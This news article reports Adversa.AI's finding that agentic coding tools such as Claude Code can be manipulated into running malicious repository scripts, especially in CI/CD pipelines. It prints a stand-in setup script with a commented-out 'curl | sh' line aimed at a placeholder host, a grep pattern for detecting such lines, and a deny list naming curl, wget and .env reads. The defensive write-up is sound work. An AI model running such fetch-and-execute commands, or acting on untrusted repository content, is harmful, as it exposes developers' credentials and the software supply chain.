Researchers at Adversa.AI have identified security vulnerabilities in AI coding tools such as Claude Code that pose potential threats to the software supply chain. The same automation that makes agentic AI attractive for streamlining tasks conceals significant risks when the tools are manipulated by malicious actors.
Understanding the Vulnerabilities
Claude Code, launched in May 2025, quickly gained popularity among startups and engineering firms for its efficiency and strong user satisfaction. However, recent findings show that its agentic capabilities can be exploited to execute remote code with minimal effort from attackers. The threat emerges when developers unknowingly incorporate harmful code from repositories hosted on platforms such as GitHub.
When a developer points Claude Code at a new task, the tool scans available repositories for useful code. If it downloads and runs a malicious script, the developer’s system is compromised. The tool’s default security prompt, which asks whether a project is trustworthy, trains users to approve potentially dangerous actions with a single keypress, much as routine browser security warnings do.
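The fetch-and-run pattern described above can be sketched with a harmless stand-in. This is not the payload from Adversa’s report; the URL is a placeholder and the dangerous command is left commented out:

```shell
#!/usr/bin/env sh
# Illustrative stand-in for the attack class described above: a repository
# "setup" script that, if executed unreviewed by an agent, would pull and
# run attacker-controlled code. The URL is a placeholder; the dangerous
# line is commented out and only echoed.
echo "Installing project dependencies..."
STAGE2="https://example.invalid/stage2.sh"
# A real payload would do:  curl -fsSL "$STAGE2" | sh
echo "setup would fetch and execute: $STAGE2"
```

A script like this looks like routine setup to both the developer and the agent, which is exactly why a one-keypress trust prompt is a weak defense.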
Implications for Developers and CI/CD
Adversa.AI has demonstrated how accepting unverified code could initiate long-lasting command-and-control operations. The risk is heightened when Claude Code runs inside continuous integration and continuous delivery (CI/CD) pipelines. There, attackers can embed harmful payloads into widely distributed software and gain access to sensitive data such as environment variables and credentials.
Adversa’s co-founder, Alex Polyakov, noted that developers frequently clone unfamiliar repositories and run Claude Code against them, making such attacks feasible. Adversa’s findings indicate that other tools, including Gemini CLI and Copilot CLI, exhibit similar vulnerabilities, underscoring a broader industry issue.
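One cheap layer of defense before an agent touches a freshly cloned repository is a pre-flight scan for fetch-and-execute one-liners. The function below is an illustrative sketch, not a tool from the report; its name and patterns are the author’s own assumptions, and a determined attacker can evade a grep:

```shell
# scan_fetch_exec: naive pre-flight scan of a checkout for shell one-liners
# that pipe a download straight into an interpreter (e.g. curl ... | sh).
# Prints matching lines with file and line number; exits nonzero if none found.
scan_fetch_exec() {
  grep -rnE '(curl|wget)[^|;&]*\|[[:space:]]*(ba|z|da)?sh' "$1" 2>/dev/null
}
```

Running this against a clone before granting an agent any execution permissions catches only the crudest payloads, but it turns a silent compromise into a visible diff-review question.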
Recommended Mitigations and Industry Response
Despite Adversa’s warnings, Anthropic, the company behind Claude Code, has not implemented any changes, leaving responsibility with users to make informed decisions. Adversa suggests restricting risky permissions in Claude Code’s settings files to mitigate the threat, and recommends verifying code in CI/CD pipelines before deployment.
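Restricting permissions could take roughly the following shape in a project-level Claude Code settings file. The deny rules below are illustrative, not a verified or exhaustive policy, and the exact rule syntax should be checked against Anthropic’s current documentation:

```json
{
  "permissions": {
    "deny": [
      "Bash(curl:*)",
      "Bash(wget:*)",
      "Read(.env)",
      "Read(.env.*)"
    ]
  }
}
```

A policy along these lines would stop the agent from running common download commands or reading credential files without explicit approval, narrowing the window for the fetch-and-run attacks Adversa describes.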
Further investigations reveal that this vulnerability is not isolated to Claude Code but extends to other agentic coding interfaces. As researchers continue to explore these risks, the focus remains on enhancing security measures to protect against potential supply chain disruptions.
In conclusion, while AI coding tools offer significant productivity benefits, they also require careful oversight to prevent exploitation. Ensuring informed user decisions and implementing robust security protocols are crucial for safeguarding the software supply chain.
